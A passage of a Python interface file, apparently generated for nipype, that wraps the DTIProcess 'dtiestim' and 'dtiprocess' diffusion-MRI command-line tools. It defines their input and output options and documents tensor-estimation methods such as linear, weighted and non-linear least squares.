        desc="Shift eigenvalues so all are positive (accounts for bad tensors related to noise or acquisition error). This is the same option as the one available in DWIToDTIEstimation in Slicer (but instead of just adding the minimum eigenvalue to all the eigenvalues if it is smaller than 0, we use a coefficient to have stictly positive eigenvalues", argstr="--shiftNeg ")
    shiftNegCoeff = traits.Float(
        desc="Shift eigenvalues so all are positive (accounts for bad tensors related to noise or acquisition error). Instead of just adding the minimum eigenvalue to all the eigenvalues if it is smaller than 0, we use a coefficient to have stictly positive eigenvalues. Coefficient must be between 1.0 and 1.001 (included).", argstr="--shiftNegCoeff %f")
class dtiestimOutputSpec(TraitedSpec):
    # Each output appears only when the matching Either(Bool, File) input
    # on dtiestimInputSpec was requested.
    tensor_output = File(desc="Tensor OutputImage", exists=True)
    B0 = File(desc="Baseline image, average of all baseline images", exists=True)
    idwi = File(desc="idwi output image. Image with isotropic diffusion-weighted information = geometric mean of diffusion images", exists=True)
    B0_mask_output = File(desc="B0 mask used for the estimation. B0 thresholded either with the -t option value or the automatic OTSU value", exists=True)
class dtiestim(SEMLikeCommandLine):
    """title: DTIEstim (DTIProcess)
category: Diffusion.Diffusion Weighted Images
description: dtiestim is a tool that takes in a set of DWIs (with --dwi_image option) in nrrd format and estimates a tensor field out of it. The output tensor file name is specified with the --tensor_output option
There are several methods to estimate the tensors which you can specify with the option --method lls|wls|nls|ml . Here is a short description of the different methods:
lls
Linear least squares. Standard estimation technique that recovers the tensor parameters by multiplying the log of the normalized signal intensities by the pseudo-inverse of the gradient matrix. Default option.
wls
Weighted least squares. This method is similar to the linear least squares method except that the gradient matrix is weighted by the original lls estimate. (See <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., and <NAME>. Formal characterization and extension of the linearized diffusion tensor model. Human Brain Mapping 24, 2 (Feb. 2005), 144-155. for more information on this method). This method is recommended for most applications. The weight for each iteration can be specified with the --weight_iterations. It is not currently the default due to occasional matrix singularities.
nls
Non-linear least squares. This method does not take the log of the signal and requires an optimization based on levenberg-marquadt to optimize the parameters of the signal. The lls estimate is used as an initialization. For this method the step size can be specified with the --step option.
ml
Maximum likelihood estimation. This method is experimental and is not currently recommended. For this ml method the sigma can be specified with the option --sigma and the step size can be specified with the --step option.
You can set a threshold (--threshold) to have the tensor estimated to only a subset of voxels. All the baseline voxel value higher than the threshold define the voxels where the tensors are computed. If not specified the threshold is calculated using an OTSU threshold on the baseline image.The masked generated by the -t option or by the otsu value can be saved with the --B0_mask_output option.
dtiestim also can extract a few scalar images out of the DWI set of images:
- the average baseline image (--B0) which is the average of all the B0s.
- the IDWI (--idwi)which is the geometric mean of the diffusion images.
You can also load a mask if you want to compute the tensors only where the voxels are non-zero (--brain_mask) or a negative mask and the tensors will be estimated where the negative mask has zero values (--bad_region_mask)
version: 1.2.0
documentation-url: http://www.slicer.org/slicerWiki/index.php/Documentation/Nightly/Extensions/DTIProcess
license: Copyright (c)  <NAME>. All rights reserved.
See http://www.ia.unc.edu/dev/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.  See the above copyright notices for more information.
contributor: <NAME>, <NAME>
acknowledgements: <NAME>(1,3,4); <NAME>(1); (1=University of Iowa Department of Psychiatry, 3=University of Iowa Department of Biomedical Engineering, 4=University of Iowa Department of Electrical and Computer Engineering) provided conversions to make DTIProcess compatible with Slicer execution, and simplified the stand-alone build requirements by removing the dependancies on boost and a fortran compiler.
"""
    # Wiring for the SEMLikeCommandLine machinery: trait specs defined above.
    input_spec = dtiestimInputSpec
    output_spec = dtiestimOutputSpec
    # Executable invoked (surrounding spaces come from the generator).
    _cmd = " dtiestim "
    # Default filenames used when the corresponding output is requested as True.
    _outputs_filenames = {'B0': 'B0.nii', 'idwi': 'idwi.nii', 'tensor_output': 'tensor_output.nii', 'B0_mask_output': 'B0_mask_output.nii'}
    # Tool does not need an X display.
    _redirect_x = False
class dtiprocessInputSpec(CommandLineInputSpec):
dti_image = File(desc="DTI tensor volume", exists=True, argstr="--dti_image %s")
fa_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Fractional Anisotropy output file", argstr="--fa_output %s")
md_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Mean Diffusivity output file", argstr="--md_output %s")
sigma = traits.Float(desc="Scale of gradients", argstr="--sigma %f")
fa_gradient_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Fractional Anisotropy Gradient output file", argstr="--fa_gradient_output %s")
fa_gradmag_output = traits.Either(traits.Bool, File(), hash_files=False, desc="Fractional Anisotropy Gradient Magnitude output file", argstr="--fa_gradmag_output %s")
color_fa_output = traits.Either(traits.Bool, File(), |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.